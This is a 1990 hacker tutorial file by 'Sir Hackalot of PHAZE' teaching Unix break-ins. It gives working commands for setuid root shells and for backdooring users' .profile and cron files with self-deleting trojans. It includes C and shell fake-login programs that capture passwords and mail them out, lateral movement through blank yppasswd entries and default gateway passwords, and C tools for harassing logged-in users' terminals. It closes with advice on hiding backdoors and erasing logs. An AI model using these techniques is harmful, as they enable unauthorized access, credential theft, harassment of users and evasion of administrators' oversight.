UNIX HACK #2
Account Adding
There are other programs that will add users to the system, instead of
ed. But most of these programs will NOT allow a root level user to be
added, or anything less than a UID of 100. One of these programs is
named "adduser". Now, the reason I have stuck this little section
in,
is for those who want to use a unix for something useful. Say you want
a "mailing address". If the unix has uucp on it, or is a big college,
chances are, it will do mail transfers. You'll have to test the unix
by trying to send mail to a friend somewhere, or just mailing
yourself. If the mailer is identified as "smail" when you mail
yourself (the program name will be imbedded in the message) that
probably means that the system will send out UUCP mail. This is a good
way to keep in contact with people. Now, this is why you'd want a
semi-permanent account. The way to achieve this is by adding an
account similar to those already on the system. If all the user-level
accounts (UID >= 100) are three letter abbriviations, say "btc"
for
Bill The Cat, or "brs" for bill ryan smith, add an account via
adduser, and make a name like sally jane marshall or something (they
don't expect hackers to put in female names) and have the account
named sjm. See, in the account description (like Mr. Hackalot above),
that is where the real name is usually stored. So, sjm might look like
this: sjm::101:50:Sally Jane Marshall:/usr/sjm:/bin/sh Of course, you
will password protect this account, right? Also, group id's don't have
to be above 100, but you must put the account into one that exists.
Now, once you login with this account, the first thing you'd want to
do is execute "passwd" to set a password up. If you don't, chances
are
someone else 'll do it for you (Then you'll be SOL).
-------------------
Set The User ID
-------------------
This is porbably one of the most used schemes. Setting up an "UID-
Shell". What does this mean? Well, it basically means you are going
to
set the user-bit on a program. The program most commonly used is a
shell (csh,sh, ksh, etc). Why? Think about it: You'll have access to
whatever the owner of the file does. A UID shell sets the user-ID of
the person who executes it to the owner of the program. So if root
owns a uid shell, then you become root when you run it. This is an
alternate way to become root.
Say you get in and modify the passwd file and make a root level
account unpassworded, so you can drop in. Of course, you almost HAVE
to get rid of that account or else it WILL be noticed eventually. So,
what you would do is set up a regular user account for yourself, then,
make a uid shell. Usually you would use /bin/sh to do it. After adding
the regular user to the passwd file, and setting up his home
directory, you could do something like this:
(assume you set up the account: shk)
# cp /bin/sh /usr/shk/runme
# chmod a+s /usr/shk/runme
Thats all there would be to it. When you logged in as shk,
you could just type in:
$ runme
#
See? You'd then be root. Here is a thing to do:
$ id
uid=104(shk) gid=50(user)
$ runme
# id
uid=104(shk) gid=50(user) euid=0(root)
#
The euid is the "effective" user ID. UID-shells only set the effective
userid, not the real user-id. But, the effective user id over-rides
the real user id. Now, you can, if you wanted to just be annoying,
make the utilities suid to root. What do I mean? For instance, make
'ls' a root 'shell'. :
# chmod a+s /bin/ls
# exit
$ ls -l /usr/fred
..
......
etc crap
Ls would then be able to pry into ANY directory. If you did the same
to "cat" you could view any file. If you did it to rm, you could
delete any file. If you did it to 'ed', you could edit any-file
(nifty!), anywhere on the system (usually).
How do I get root?
------------------
Good question indeed. To make a program set the user-id shell to root,
you have to be root, unless you're lucky. What do I mean? Well, say
you find a program that sets the user-id to root. If you have access
to write to that file, guess what? you can copy over it, but keep the
uid bit set. So, say you see that the program chsh is setting the user
id too root. You can copy /bin/sh over it.
$ ls -l
rwsrwsrws root other 10999 Jan 4 chsh
$ cp /bin/sh chsh
$ chsh
#
See? That is just one way. There are others, which I will now talk
about.
More on setting the UID
-----------------------
Now, the generic form for making a program set the User-ID bit
is to use this command:
chmod a+s file
Where 'file' is a valid existing file. Now, only those who own the
file can set the user ID bit. Remember, anything YOU create, YOU own,
so if you copy th /bin/sh, the one you are logged in as owns it, or IF
the UID is set to something else, the New UID owns the file. This
brings me to BAD file permissions.
II. HACKING : Bad Directory Permissions
Now, what do I mean for bad directory permissions? Well, look for
files that YOU can write to, and above all, DIRECTORIES you can write
to. If you have write permissions on a file, you can modify it. Now,
this comes in handy when wanting to steal someone's access. If you can
write to a user's .profile, you are in business. You can have that
user's .profile create a suid shell for you to run when You next logon
after the user. If the .profile is writable to you, you can do this:
$ ed .profile
[some number will be here]
? a
cp /bin/sh .runme
chmod a+x .runme
chmod a+s .runme
(control-d)
? w
[new filesize will be shown]
? q
$
Now, when the user next logs on, the .profile will create .runme which
will set your ID to the user whose .profile you changed. Ideally,
you'll go back in and zap those lines after the suid is created, and
you'll create a suid somewhere else, and delete the one in his dir.
The .runme will not appear in the user's REGULAR directory list, it
will only show up if he does "ls -a" (or ls with a -a combination),
because, the '.' makes a file hidden.
The above was a TROJAN HORSE, which is one of the most widely
used/abused method of gaining more power on a unix. The above could be
done in C via the system() command, or by just plain using open(),
chmod(), and the like. * Remember to check and see if the root user's
profile is writeable * * it is located at /.profile (usually) *
The BEST thing that could happen is to find a user's directory
writeable by you. Why? well, you could replace all the files in the
directory with your own devious scripts, or C trojans. Even if a file
is not writeable by you, you can still overwrite it by deleteing it.
If you can read various files, such as the user's .profile, you can
make a self deleting trojan as so:
$ cp .profile temp.pro
$ ed .profile
1234
? a
cp /bin/sh .runme
chmod a+x .runme
chmod a+s .runme
mv temp.pro .profile
(control-d)
? w
[another number]
? q
$ chown that_user temp.pro
What happens is that you make a copy of the .profile before you
change it. Then, you change the original. When he runs it, the steps
are made, then the original version is placed over the current, so if
the idiot looks in his .profile, he won't see anything out of the
ordinary, except that he could notice in a long listing that the
change date is very recent, but most users are not paranoid enough to
do extensive checks on their files, except sysadm files (such as
passwd).
Now, remember, even though you can write to a dir, you may not be able
to write to a file without deleting it. If you do not have write perms
for that file, you'll have to delete it and write something in its
place (put a file with the same name there). The most important thing
to remember if you have to delete a .profile is to CHANGE the OWNER
back after you construct a new one (hehe) for that user. He could
easily notice that his .profile was changed and he'll know who did it.
YES, you can change the owner to someone else besides yourself and the
original owner (as to throw him off), but this is not wise as keeping
access usually relies on the fact that they don't know you are around.
You can easily change cron files if you can write to them. I'm not
going to go into detail about cronfile formats here, just find the
crontab files and modify them to create a shell somewhere as root
every once in a while, and set the user-id.
III. Trojan Horses on Detached terminals.
Basically this: You can send garbage to a user's screen and mess him
up bad enough to force a logoff, creating a detached account. Then you
can execute a trojan horse off that terminal in place of login or
something, so the next one who calls can hit the trojan horse. This
USUALLY takes the form of a fake login and write the username/pw
entererred to disk.
Now, there are other trojan horses available for you to write. Now,
don't go thinking about a virus, for they don't work unless ROOT runs
them. Anyway, a common trjan would be a shell script to get the
password, and mail it to you. Now, you can replace the code for the
self deleting trojan with one saying something like:
echo "login: \c"
read lgin
echo off (works on some systems)
(if above not available...: stty -noecho)
echo "Password:\c"
read pw
echo on
echo "Login: $lgin - Pword: $pw" | mail you
Now, the best way to use this is to put it in a seperate script file
so it can be deleted as part of the self deleting trojan. A quick
modification, removing the "login: " and leaving the password
may have
it look like SU, so you can get the root password. But make sure the
program deletes itself. Here is a sample trojan login in C:
#include <stdio.h>
/* Get the necessary defs.. */
main()
{
char *name[80];
char *pw[20];
FILE *strm;
printf("login: ");
gets(name);
pw = getpass("Password:");
strm = fopen("/WhereEver/Whateverfile","a");
fprintf(strm,"User: (%s), PW [%s]\n",name,pw);
fclose(strm);
/* put some kind of error below... or something... */
printf("Bus Error - Core Dumped\n");
exit(1);
}
The program gets the login, and the password, and appends it to a file
(/wherever/whateverfile), and creates the file if it can, and if its
not there. That is just an example. Network Annoyances come later.
IV. Odd systems
There may be systems you can log in to with no problem, and find some
slack menu, database, or word processor as your shell, with no way to
the command interpreter (sh, ksh, etc..). Don't give up here. Some
systems will let you login as root, but give you a menu which will
allow you to add an account. However, ones that do this usually have
some purchased software package running, and the people who made the
software KNOW that the people who bought it are idiots, and the thing
will sometimes only allow you to add accounts with user-id 100 or
greater, with their special menushell as a shell. You probably won't
get to pick the shell, the program will probably stick one on the user
you created which is very limiting. HOWEVER, sometimes you can edit
accounts, and it will list accounts you can edit on the screen.
HOWEVER, these programs usually only list those with UIDS > 100 so you
don't edit the good accounts, however, they donot stop you from
editing an account with a UID < 100. The "editing" usually
only
involves changing the password on the account. If an account has a *
for a password, the standard passwd program which changes programs,
will say no pw exists, and will ask you to enter one. (wallah! You
have just freed an account for yourself. Usually bin and sys have a *
for a password). If one exists you'll have to enter the old Password
(I hope you know it!) for that account. Then, you are in the same boat
as before. (BTW -- These wierd systems are usually Xenix/386,
Xenix/286, or Altos/286) With word processors, usually you can select
the load command, and when the word processor prompts for a file, you
can select the passwd file, to look for open accounts, or at least
valid ones to hack. An example would be the informix system. You can
get a word processor with that such as Samna word, or something, and
those Lamers will not protect against shit like that. Why? The Passwd
file HAS to be readable by all for the most part, so each program can
"stat" you. However, word processors could be made to restrict
editing
to a directory, or set of directories. Here is an example:
$ id
uid=100(sirhack) gid=100(users)
$ sword
(word processor comes up)
(select LOAD A FILE)
<Edit File>: /etc/passwd
<Loading..>
(you see: )
root:dkdjkgsf!!!:0:0:Sysop:/:/bin/sh
sirhack:dld!k%%^%:100:100:Sir Hackalot:/usr/usr1/sirhack:/bin/sh
datawiz::101:100:The Data Wizard:/usr/usr1/datawiz:/bin/sh
...
Now I have found an account to take over! "datawiz" will get me
in
with no trouble, then I can change his password, which he will not
like at all. Some systems leave "sysadm" unpassworded (stupid!),
and
now, Most versions of Unix, be it Xenix, Unix, BSD, or whatnot, they
ship a sysadm shell which will menu drive all the important shit, even
creating users, but you must have ansi or something.
You can usually tell when you'll get a menu. Sometimes on UNIX SYSTEM
V, when it says TERM = (termtype), and is waiting for you to press
return or whatever, you will probably get a menu.. ack.
V. Shadowed Password files
Not much to say about this. all it is, is when every password field in
the password file has an "x" or just a single character. What
that
does is screw you, becuase you cannot read the shadowed password file,
only root can, and it contains all the passwords, so you will not know
what accounts have no passwords, etc.
There are a lot of other schemes for hacking unix, lots of others,
from writing assembly code that modifies the PCB through self-changing
code which the interrupt handler doesn't catch, and things like that.
However, I do not want to give away everything, and this was not meant
for advanced Unix Hackers, or atleast not the ones that are familiar
with 68xxx, 80386 Unix assembly language or anything. Now I will Talk
about Internet.
--->>> InterNet <<<---
Why do I want to talk about InterNet? Well, because it is a prime
example of a TCP/IP network, better known as a WAN
(Wide-Area-Network). Now, mainly you will find BSD systems off of the
Internet, or SunOS, for they are the most common. They may not be when
System V, Rel 4.0, Version 2.0 comes out. Anyway, these BSDs/SunOSs
like to make it easy to jump from one computer to another once you are
logged in. What happens is EACH system has a "yello page password
file". Better known as yppasswd. If you look in there, and see blank
passwords you can use rsh, rlogin, etc.. to slip into that system. One
system in particular I came across had a a yppasswd file where *300*
users had blank passwords in the Yellow Pages. Once I got in on the
"test" account, ALL I had to do was select who I wanted to be,
and do:
rlogin -l user (sometimes -n). Then it would log me onto the system I
was already on, through TCP/IP. However, when you do this, remember
that the yppasswd only pertains to the system you are on at the time.
To find accounts, you could find the yppasswd file and do:
% cat yppasswd | grep ::
Or, if you can't find yppasswd..
% ypcat passwd | grep ::
On ONE system (which will remain confidential), I found the DAEMON
account left open in the yppasswd file. Not bad. Anyway, through one
system on the internet, you can reach many. Just use rsh, or rlogin,
and look in the file: /etc/hosts for valid sites which you can reach.
If you get on to a system, and rlogin to somewhere else, and it asks
for a password, that just means one of two things:
A. Your account that you have hacked on the one computer is on the
target computer as well. Try to use the same password (if any) you
found the hacked account to have. If it is a default, then it is
definitly on the other system, but good luck...
B. rlogin/rsh passed your current username along to the remote
system, so it was like typing in your login at a "login: " prompt.
You
may not exist on the other machine. Try "rlogin -l login_name",
or
rlogin -n name.. sometimes, you can execute "rwho" on another
machine,
and get a valid account.
Some notes on Internet servers. There are "GATEWAYS" that you
can get
into that will allow access to MANY internet sites. They are mostly
run off a modified GL/1 or GS/1. No big deal. They have help files.
However, you can get a "privilged" access on them, which will
give you
CONTROL of the gateway.. You can shut it down, remove systems from the
Internet, etc.. When you request to become privileged, it will ask for
a password. There is a default. The default is "system". I have
come
across *5* gateways with the default password. Then again, DECNET has
the same password, and I have come across 100+ of those with the
default privileged password. CERT Sucks. a Gateway that led to
APPLE.COM had the default password. Anyone could have removed
apple.com from the internet. Be advised that there are many networks
now that use TCP/IP.. Such as BARRNET, LANET, and many other
University networks.
--** Having Fun **--
Now, if nothing else, you should atleast have some fun. No, I do not
mean go trashing hardrives, or unlinking directories to take up
inodes, I mean play with online users. There are many things to do.
Re-direct output to them is the biggie. Here is an example:
$ who
loozer tty1
sirhack tty2
$ banner You Suck >/dev/tty1
$
That sent the output to loozer. The TTY1 is where I/O is being
performed to his terminal (usually a modem if it is a TTY). You can
repetitiously banner him with a do while statement in shell, causing
him to logoff. Or you can get sly, and just screw with him. Observe
this C program:
#include <stdio.h>
#include <fcntl.h>
#include <string.h>
main(argc,argument)
int argc;
char *argument[];
{
int handle;
char *pstr,*olm[80];
char *devstr = "/dev/";
int acnt = 2;
FILE *strm;
pstr = "";
if (argc == 1) {
printf("OL (OneLiner) Version 1.00 \n");
printf("By Sir Hackalot [PHAZE]\n");
printf("\nSyntax: ol tty message\n");
printf("Example: ol tty01 You suck\n");
exit(1);
}
printf("OL (OneLiner) Version 1.0\n");
printf("By Sir Hackalot [PHAZE]\n");
if (argc == 2) {
strcpy(olm,"");
printf("\nDummy! You forgot to
Supply a ONE LINE MESSAGE\n");
printf("Enter one Here => ");
gets(olm);
}
strcpy(pstr,"");
strcat(pstr,devstr);
strcat(pstr,argument[1]);
printf("Sending to: [%s]\n",pstr);
strm = fopen(pstr,"a");
if (strm == NULL) {
printf("Error writing to: %s\n",pstr);
printf("Cause: No Write Perms?\n");
exit(2);
}
if (argc == 2) {
if (strcmp(logname(),"sirhack") != 0)
fprintf(strm,"Message from (%s): \n",logname());
fprintf(strm,"%s\n",olm);
fclose(strm);
printf("Message Sent.\n");
exit(0);
}
if (argc > 2) {
if (strcmp(logname(),"sirhack") != 0)
fprintf(strm,"Message from (%s):\n",logname());
while (acnt <= argc - 1) {
fprintf(strm,"%s ",argument[acnt]);
acnt++;
}
fclose(strm);
printf("Message sent!\n");
exit(0);
}
}
What the above does is send one line of text to a device writeable by you
in /dev. If you try it on a user named "sirhack" it will notify
sirhack of
what you are doing. You can supply an argument at the command line, or
leave a blank message, then it will prompt for one. You MUST supply a
Terminal. Also, if you want to use ?, or *, or (), or [], you must not
supply a message at the command line, wait till it prompts you. Example:
$ ol tty1 You Suck!
OL (OneLiner) Version 1.00
by Sir Hackalot [PHAZE]
Sending to: [/dev/tty1]
Message Sent!
$
Or..
$ ol tty1
OL (OneLiner) Version 1.00
by Sir Hackalot [PHAZE]
Dummy! You Forgot to Supply a ONE LINE MESSAGE!
Enter one here => Loozer! Logoff (NOW)!! ^G^G
Sending to: [/dev/tty1]
Message Sent!
$
You can even use it to fake messages from root. Here is another:
/*
* Hose another user
*/
#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <signal.h>
#include <utmp.h>
#include <time.h>
#include <termio.h>
#include <sys/utsname.h>
#define NMAX sizeof(ubuf.ut_name)
struct utmp ubuf;
struct termio oldmode, mode;
struct utsname name;
int yn;
int loop = 0;
char *realme[50] = "Unknown";
char *strcat(), *strcpy(), me[50] = "???", *him, *mytty,
histty[32];
char *histtya, *ttyname(), *strrchr(), *getenv();
int signum[] = {SIGHUP, SIGINT, SIGQUIT, 0}, logcnt, eof(),
timout();
FILE *tf;
main(argc, argv)
int argc;
char *argv[];
{
register FILE *uf;
char c1, lastc;
int goodtty = 0;
long clock = time((long *) 0);
struct tm *localtime();
struct tm *localclock = localtime( &clock );
struct stat stbuf;
char psbuf[20], buf[80], window[20], junk[20];
FILE *pfp, *popen();
if (argc < 2) {
printf("usage: hose user [ttyname]\n");
exit(1);
}
him = argv[1];
if (argc > 2)
histtya = argv[2];
if ((uf = fopen("/etc/utmp", "r")) == NULL) {
printf("cannot open /etc/utmp\n");
exit(1);
}
cuserid(me);
if (me == NULL) {
printf("Can't find your login name\n");
exit(1);
}
mytty = ttyname(2);
if (mytty == NULL) {
printf("Can't find your tty\n");
exit(1);
}
if (stat(mytty, &stbuf) < 0) {
printf("Can't stat your tty --
This System is bogus.\n");
}
if ((stbuf.st_mode&02) == 0) {
printf("You have write permissions
turned off (hehe!).\n");
}
if (histtya) {
if (!strncmp(histtya, "/dev/", 5))
histtya = strrchr(histtya, '/') + 1;
strcpy(histty, "/dev/");
strcat(histty, histtya);
}
while (fread((char *)&ubuf, sizeof(ubuf), 1, uf) == 1) {
if (ubuf.ut_name[0] == '\0')
continue;
if (!strncmp(ubuf.ut_name, him, NMAX)) {
logcnt++;
if (histty[0]==0) {
strcpy(histty, "/dev/");
strcat(histty, ubuf.ut_line);
}
if (histtya) {
if (!strcmp(ubuf.ut_line, histtya))
goodtty++;
}
}
}
fclose(uf);
if (logcnt==0) {
printf("%s not found! (Not logged in?)\n", him);
exit(1);
}
if (histtya==0 && logcnt > 1) {
printf("%s logged more than once\nwriting to %s\n",
him, histty+5);
}
if (access(histty, 0) < 0) {
printf("No such tty? [%s]\n",histty);
exit(1);
}
signal(SIGALRM, timout);
alarm(5);
if ((tf = fopen(histty, "w")) == NULL)
goto perm;
alarm(0);
if (fstat(fileno(tf), &stbuf) < 0)
goto perm;
if (geteuid() != 0 && (stbuf.st_mode&02) == 0)
goto perm;
ioctl(0, TCGETA, &oldmode); /* save tty state */
ioctl(0, TCGETA, &mode);
sigs(eof);
uname(&name);
if (strcmp(him,"YOURNAMEHERE") == 0) yn = 1;
if (yn == 1 ) {
fprintf(tf, "\r(%s attempted to HOSE You with NW)\r\n",me);
fclose(tf);
printf("Critical Error Handler: %s running conflicting process\n"
,him);
exit(1);
}
fflush(tf);
mode.c_cc[4] = 1;
mode.c_cc[5] = 0;
mode.c_lflag &= ~ICANON;
ioctl(0, TCSETAW, &mode);
lastc = '\n';
printf("Backspace / Spin Cursor set lose on: %s\n",him);
while (loop == 0) {
c1 = '\b';
write(fileno(tf),&c1,1);
sleep(5);
fprintf(tf,"\\\b|\b/\b-\b+\b");
fflush(tf);
}
perm:
printf("Write Permissions denied!\n");
exit(1);
}
timout()
{
printf("Timeout opening their tty\n");
exit(1);
}
eof()
{
printf("Bye..\n");
ioctl(0, TCSETAW, &oldmode);
exit(0);
}
ex()
{
register i;
sigs(SIG_IGN);
i = fork();
if (i < 0) {
printf("Try again\n");
goto out;
}
if (i == 0) {
sigs((int (*)())0);
execl(getenv("SHELL")?
getenv("SHELL"):"/bin/sh","sh","-t",0);
exit(0);
}
while(wait((int *)NULL) != i)
;
printf("!\n");
out:
sigs(eof);
}
sigs(sig)
int (*sig)();
{
register i;
for (i=0; signum[i]; i++)
signal(signum[i], sig);
}
What the above is, is a modified version of the standard write
command. What it does, is spin the cursor once, then backspace once
over the screen of the user it is run on. All though, it does not
physically affect input, the user thinks it does. therefore, he
garbles input. The sleep(xx) can be changed to make the stuff happen
more often, or less often. If you put your login name in the
"YOURNAMEHERE" slot, it will protect you from getting hit by it,
if
someone off a Public access unix leeches the executable from your
directory. You could make a shorter program that does almost the same
thing, but you have to supply the terminal, observe:
/* Backspace virus, by Sir Hackalot [Phaze] */
#include <stdio.h>
#include <fcntl.h>
main(argc,argv)
char *argv[];
int argc;
{
int x = 1;
char *device = "/dev/";
FILE *histty;
if (argc == 1) {
printf("Bafoon. Supply a TTY.\n");
exit(1);
}
strcat(device,argv[1]);
/* Make the filename /dev/tty.. */
histty = fopen(device,"a");
if (histty == NULL) {
printf("Error opening/writing to tty. Check their perms.\n");
exit(1);
}
printf("BSV - Backspace virus, By Sir Hackalot.\n");
printf("The Sucker on %s is getting it!\n",device);
while (x == 1) {
fprintf(histty,"\b\b");
fflush(histty);
sleep(5);
}
}
Thats all there is to it. If you can write to their tty, you can use
this on them. It sends two backspaces to them every approx.
5 seconds. You should run this program in the background. (&).
Here is an example:
$ who
sirhack tty11
loozer tty12
$ bsv tty12&
[1] 4566
BSV - Backspace virus, by Sir Hackalot
The Sucker on /dev/tty12 is getting it!
$
Now, it will keep "attacking" him, until he loggs of, or you kill
the
process
(which was 4566 -- when you use &, it gives the pid [usually]).
** Note *** Keep in mind that MSDOS, and other OP systems use The CR/LF
method to terminate a line. However, the LF terminates a line in Unix.
you must STRIP CR's on an ascii upload if you want something you upload
to an editor to work right. Else, you'll see a ^M at the end of every
line. I know that sucks, but you just have to compensate for it.
I have a number of other programs that annoy users, but that is
enough to get your imagination going, provided you are a C programmer.
You can annoy users other ways. One thing you can do is screw up the
user's mailbox. The way to do this is to find a binary file (30k or
bigger) on the system which YOU have access to read. then, do this:
$ cat binary_file | mail loozer
or
$ mail loozer < binary file
That usually will spilt into 2 messages or more. The 1st message will
have a from line.. (from you ..), but the second WILL NOT! Since it
does not, the mail reader will keep exiting and giving him an error
message until it gets fixed.. The way to fix it is to go to the mail
box that got hit with this trick (usually only the one who got hit (or
root) and do this), and edit the file, and add a from line.. like From
username..
then it will be ok. You can screw the user by "cat"ing a binary
to
his tty. say Loozer is on tty12. You can say..
$ cat binary_file >/dev/tty12
$
It may pause for a while while it outputs it.
If you want to resume what
you were doing instantly, do:
$ cat binary_file >/dev/tty12&
[1] 4690
$
And he will probably logoff.
You can send the output of anything to his
terminal. Even what YOU do in shell. Like this:
$ sh >/dev/tty12
$
You'll get your prompts,
but you won't see the output of any commands, he
will...
$ ls
$ banner Idiot!
$ echo Dumbass!
$
until you type in exit, or hit ctrl-d.
There are many many things you can do.
You can fake a "write" to someone and make them think it was
from somewhere on the other side of hell. Be creative.
When you are looking for things to do, look for holes, or try to get
someone to run a trojan horse that makes a suid shell. If you get
someone to run a trojan that does that, you can run the suid, and log
their ass off by killing their mother PID. (kill -9 whatever). Or, you
can lock them out by adding "kill -1 0" to their .profile. On
the
subject of holes, always look for BAD suid bits. On one system thought
to be invincible I was able to read/modify everyone's mail, because I
used a mailer that had both the GroupID set, and the UserID set. When
I went to shell from it, the program instantly changed my Effective ID
back to me, so I would not be able to do anything but my regular
stuff. But it was not designed to change the GROUP ID back. The sysop
had blundered there. SO when I did an ID I found my group to be
"Mail". Mailfiles are readble/writeable by the user "mail",
and the
group "mail". I then set up a sgid (set group id) shell to change
my
group id to "mail" when I ran it, and scanned important mail,
and it
got me some good info. So, be on the look out for poor permissions.
Also, after you gain access, you may want to keep it. Some tips on
doing so is:
1. Don't give it out. If the sysadm sees that joeuser logged
in 500 times in one night....then.... 2. Don't stay on for
hours at a time. They can trace you then. Also they will know
it is irregular to have joeuser on for 4 hours after work. 3.
Don't trash the system. Don't erase important files, and don't
hog inodes, or anything like that. Use the machine for a
specific purpose (to leech source code, develop programs, an
Email site). Dont be an asshole, and don't try to erase
everything you can. 4. Don't screw with users constantly.
Watch their processes and run what they run. It may get you
good info (snoop!) 5. If you add an account, first look at the
accounts already in there If you see a bunch of accounts that
are just 3 letter abbrv.'s, then make yours so. If a bunch are
"cln, dok, wed" or something, don't add one that is "joeuser",
add one that is someone's full initials.
6. When you add an account, put a woman's name in for the
description, if it fits (Meaning, if only companies log on to
the unix, put a company name there). People do not suspect
hackers to use women's names. They look for men's names. 7.
Don't cost the Unix machine too much money. Ie.. don't abuse
an outdial, or if it controls trunks, do not set up a bunch of
dial outs. If there is a pad, don't use it unless you NEED it.
8. Don't use x.25 pads. Their usage is heavily logged. 9. Turn
off acct logging (acct off) if you have the access to. Turn it
on when you are done. 10. Remove any trojan horses you set up
to give you access when you get access. 11. Do NOT change the
MOTD file to say "I hacked this system" Just thought I'd tell
you. Many MANY people do that, and lose access within 2 hours,
if the unix is worth a spit. 12. Use good judgement. Cover
your tracks. If you use su, clean up the sulog. 13. If you use
cu, clean up the cu_log. 14. If you use the smtp bug
(wizard/debug), set up a uid shell. 15. Hide all suid shells.
Here's how: goto /usr (or any dir) do: # mkdir ".. " # cd "..
" # cp /bin/sh ".whatever" # chmod a+s ".whatever"
The "" are
NEEDED to get to the directory .. ! It will not show up in a
listing, and it is hard as hell to get to by sysadms if you
make 4 or 5 spaces in there (".. "), because all they will see
in a directory FULL list will be .. and they won't be able to
get there unless they use "" and know the spacing. ""
is used
when you want to do literals, or use a wildcard as part of a
file name. 16. Don't hog cpu time with password hackers. They
really don't work well.
17. Don't use too much disk space. If you archieve something
to dl, dl it, then kill the archieve. 18. Basically -- COVER
YOUR TRACKS.
Some final notes:
Now, I hear lots of rumors and stories like "It is getting harder to
get into systems...". Wrong. (Yo Pheds! You reading this??). It IS
true when you are dealing with WAN's, such as telenet, tyment, and the
Internet, but not with local computers not on those networks. Here's
the story:
Over the past few years, many small companies have sprung up as VARs
(Value Added Resellers) for Unix and Hardware, in order to make a fast
buck. Now, these companies fast talk companies into buying whatever,
and they proceed in setting up the Unix. Now, since they get paid by
the hour usaually when setting one up, they spread it out over
days.... during these days, the system is WIDE open (if it has a
dialin). Get in and add yourself to passwd before the seal it off (if
they do..). Then again, after the machine is set up, they leave the
defaults on the system. Why? The company needs to get in, and most
VARs cannot use unix worth a shit, all they know how to do is set it
up, and that is ALL. Then, they turn over the system to a company or
business that USUALLY has no-one that knows what they hell they are
doing with the thing, except with menus. So, they leave the system
open to all...(inadvertedly..), because they are not competant. So,
you could usually get on, and create havoc, and at first they will
think it is a bug.. I have seen this happen ALL to many times, and it
is always the same story... The VAR is out for a fast buck, so they
set up the software (all they know how to do), and install any
software packages ordered with it (following the step by step
instructions). Then they turn it over to the business who runs a word
processor, or database, or something, un aware that a "shell"
or
command line exists, and they probably don't even know root does. So,
we will see more and more of these pop up, especially since AT&T is
now bundling a version of Xwindows with their new System V, and
Simultask... which will lead to even more holes. You'll find systems
local to you that are easy as hell to get into, and you'll see what I
mean. These VARs are really actually working for us. If a security
problem arises that the business is aware of, they call the VAR to fix
it... Of course, the Var gets paid by the hour, and leaves something
open so you'll get in again, and they make more moolahhhh.
You can use this phile for whatever you want. I can't stop you. Just
to learn unix (heh) or whatever. But its YOUR ass if you get caught.
Always consider the penalties before you attempt something. Sometimes
it is not worth it, Sometimes it is.
This phile was not meant to be comprehensive, even though it may seem
like it. I have left out a LOT of techniques, and quirks, specifically
to get you to learn SOMETHING on your own, and also to retain
information so I will have some secrets. You may pass this file on,
UNMODIFIED, to any GOOD H/P BBS. Sysops can add things to the archieve
to say where it was DL'd from, or to the text viewer for the same
purpose. This is Copywrited (haha) by Sir Hackalot, and by PHAZE, in
the year 1990.
-Sir Hackalot of PHAZE